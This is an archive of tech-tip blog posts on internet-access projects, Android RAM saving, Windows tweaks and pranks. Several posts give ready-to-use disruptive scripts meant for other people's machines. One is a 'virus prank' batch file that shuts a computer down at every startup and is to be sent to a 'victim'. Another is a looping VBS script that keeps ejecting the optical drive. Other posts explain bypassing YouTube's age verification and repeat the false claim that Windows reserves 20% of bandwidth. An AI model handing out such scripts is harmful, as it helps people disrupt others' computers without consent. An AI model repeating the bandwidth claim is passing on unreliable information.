Monday, 7 August 2017

Six new technologies that will enable faster, better internet to the world


  • Facebook aims for solar-powered internet-beaming drone

Facebook founder Mark Zuckerberg is famous for expressing a desire to connect the entire globe to the internet, and the company wants to launch giant soaring drones to beam out internet access around the world. Facebook's own Connectivity Lab has developed a solar-powered drone with a wingspan as large as that of a Boeing 747. Dubbed Aquila, the drone took its first test flight in June 2016 and, while not equipped with internet technology at the time, the flight was a huge success. The actual flight lasted a whopping 96 minutes (66 minutes longer than planned), and helped the research team tackle the next phase of innovation. Someday, Facebook hopes the highly energy-efficient drones will fly in a 60-mile radius while simultaneously beaming out internet access wherever needed.

  • MIT's 330 percent faster WiFi



Just a few months ago, researchers at MIT's Computer Science and Artificial Intelligence Lab (CSAIL) announced a breakthrough in new wireless internet that is 330 percent faster and twice the bandwidth of existing technology. Dubbed MegaMIMO 2.0, the technology uses multiple transmitters and receivers to relay data simultaneously, increasing the amount of data in a given bandwidth. This development could someday lead to better, faster internet in public spaces and large gatherings like concerts and sporting events. The new technology could also address the issue of spectrum crunch by distributing data differently so that backups and congestion on the network simply don't occur.

  • Li-Fi leaves WiFi in the dark?




Last year a French startup developed a wireless internet technology based on LEDs that they claim is 100 times faster than existing WiFi. The so-called "Li-Fi" exploits the flicker rate of LED lamps, which is typically imperceptible to the naked eye. That frequency is much higher than the radio waves conventional wireless internet employs. Li-Fi requires light to work, so it can't pass through walls like WiFi, but it can be used to specifically target a specific user. What's more, its secure nature makes it a potential fit in places like hospitals or schools where speed and privacy are high priorities.

  • Projects Loon floats balloon-Based internet access

Long before Facebook launched its own drone to beam internet through the sky, Google began Project Loon, a similar initiative that relies on balloons. The high-altitude internet-equipped balloons are designed to spread connectivity in rural parts of Africa and Southeast Asia, plus anywhere else that access is spotty. The project gained traction in 2013 when Google tapped residents of California's Central Valley to volunteer to let the team install an antenna on their home in order to test the beaming balloons. Three years and many tests later on several continents, Project Loon (now operating under X, formerly Google X) continues to perfect its internet-beaming technology in the hopes of someday filling in the empty spots in the data coverage map.

  • NASA gears up to beam internet into deep space

During his 340-day mission aboard the International Space Station, American astronaut Scott Kelly became somewhat of an Instagram star, posting jaw-dropping views of the Earth (and beyond) from his outpost in the stars. So, people probably take for granted the notion that astronauts have internet access. In reality, sending data through space is nearly as complicated as space travel itself, but  NASA deployed new tech to the ISS in 2016 that could eventually be used to relay internet service even farther into deep space. If Elon Musk and Richard Branson ever find themselves living on Mars, they'll surely be grateful to the good folks at NASA for making sure they can still tweet from their new homes on the Red Planet.
  • Samsung's satellite idea
Consumer electronics company Samsung has a big idea for stretching the inter-webs around the globe -- using satellites. In 2015, the company proposed a global network of 4,600 satellites floating in low-Earth orbit that could beam up to 1 zeta byte (1 trillion gigabytes) a month. The plan would fly satellites closer to Earth than previous schemes to provide access at speeds internet users are already accustomed to at home. Will Samsung's satellite web ever actually happen? It's not likely, but wild ideas like this keep the conversation going.




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Sunday, 16 February 2014

HOW TO SAVE RAM IN ANDROID DEVICES

androidWriting some important mail or message and stuck?Camera opening and responding slowly?Are you frustrated by the lack of memory on your Android device, or by its slowness?Try out following tips these might help you to save some memory and response fast:



1. Disabling Auto Sync 
Don’t keeps your phone to Auto Sync mode unnecessary.you can sync contacts and other things manually.You can edit settings and keep mails to sync only.
2.Don’t use Live wallpapers
Disable live wallpapers and use static one. That saves RAM of your device
3.Don’t use Task killers unnecessary
disable task killers as they use more memory than they saves.you can go to App/manage and clear cache or stop or kill unused app by your self.
4. Don’t use too many widgets
Don’t fill your home screen with widgets.remove unnecessary widgets and you will find your device working smoothly.
5.Move Apps to memory card
Running and installing apps on your Android phone is what uses up all the RAM space. Try to install application on your Micro-SD storage card instead. This will free RAM space and speed up your phone.
6. Use GPS with care
You can disable GPS when not it use.keeping GPS always on will eat up some RAM and battery too.
7.Choose your apps
dont install apps which stops phone from going to sleep or keeping awake most of the time.kill these apps manually if not using
8.Stop automatic updates
Stop automatic updates of app and only install those updates which is necessary for you.
9.Use light apps
Use apps which uses less RAM memory for eg.  For people using Ebuddy for FB and Gtalk chat I would suggest using GoChat for FB chat and either the gtalk application for gtalk chat or the fring application
These are few tips Which can save good amount of RAM for you.you will find your device running smoother than earlier.

Monday, 10 February 2014

Speed Up Your Internet By 20% !

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc.You can get it back.Click Start then Run and type “gpedit.msc” without quotes. This opens the group policy editor.
Then go to:
–> Local Computer Policy
–> Computer Configuration
–> Administrative Templates
–> Network
–> QOS Packet Scheduler
–> Limit Reservable Bandwidth.
Double click on Limit Reservable bandwidth.
It will say it is not configured, but the truth is under the ‘Explain’ tab i.e.” By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default.”
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.

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Watch An Adult Stuff On Youtube Without Sign In !


Whenever youtube ask you to verify your age before watching adult content you really annoy. But to avoid being sucked just modify the url. Absolutely you can watch adult content without signing in to youtube ! Make sure that the modification of the url is correct ! Following is a complete instruction…



Step By Step Instruction:-
1. Click on the video you want to watch on youtube and copy the link from the address bar as below
http://www.youtube.com/watch?v=4zx54xss545
2.Suppose above is the link you copied . Now just modify the highlighted link as below.
http://www.youtube.com/v/4zx54xss545?fs=1
3.If you want to quickly modify your link just paste your video Idcode in the below highlighted text
http://www.youtube.com/v/Video Idcode?fs=1
4.Now you will be able to see the adult content on youtube without signing in !

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Virus Prank To Annoy Someone !


“What’s up everybody ? Today i came up with a new article that will definitely bother your friends ! I am gonna explain how to create a batch file with simple scripts that will automatically shutdown a computer every time it is turned on. This is completely harmless but great trick to play on one of your  friend’s computer. Following is a complete instruction…
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Step By Step Instruction :-
1. Open a notepad or wordpad or whatever you like .
2. Copy the following code and paste it into the notepad or wordpad.
shutdown -s -t 60
3. Save the current file as .bat extension or sorabAggarwal.bat.
4. After saving the current file just move the batch file to the start up folder, as shown the location below.
For Xp Users > C:\Documents and Settings\All Users\Start Menu\Programs\Startup For 7/8 Users > C:\Users\ User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Note:- One thing to remember the AppData is hidden in the window 7,8 or vista. Make sure to unhide it
5. Once you saved your file in the start up folder it’s now ready to open every time window log in .
6. Now send this file to your victim’s computer via pendrive, email etc.
7.Done !

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Optical Drive Constantly Open and Close Prank !

There are various Programming languages such as Basic, C++, Python, etc can be used to program several pranks and sent to others’ computer’s for fun! Today with the help of vbs script i will show you how to write a simple prank that will constantly open and close the optical drive of a computer when the program would be executed.Following is a complete instruction…

Step By Step Instruction:-
1. Open the notepad on your Windows computer.
2. Copy the following code and paste onto the notepad.
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
3. Now save the file as SorabAggarwal.vbs and save it into to the hard disk drive wherever you want to save !
4. Now the saved file will be appear and whenever you will run this file it will open and close the optical drive constantly.
5. You can transfer the file to any computer online or any removable media like a pen drive.

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Recover Hidden Files From Pendrive After Virus Infection !


As we know pen drive doesn’t consist any security measures. Since we use Pen drive in many PC/Laptops it very easily gets infected with viruses and malwares. But the problem arises when we try to access our data stored in the pen drive. When we check property of the USB Drive, Disk usage shows there are files in the pen drive but inside pen drive we can’t find any kind of file. That really mess up ! Don’t worry all the files you saved ,are safe only they are made Hidden just  by the virus.

Step By Step Instruction:-

1. Open command prompt or cmd by pressing shortcut (start+r).
    [It is better to open cmd as administrator]
2. Check Drive Letter of you pen drive from ‘My Computer’.
3. If your target drive is H. Type ‘h:‘ and hit enter.
4. Now type this command and hit enter :  attrib -r -s -h *.* /s /d
5. Now you can see all your stuff.

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Here’s the Reason Why ATM Pin has Only 4 Digit’s

We may come across major things in our day to day life. Most of the times we fail to notice the strange thing in it.  ATM machines  are no...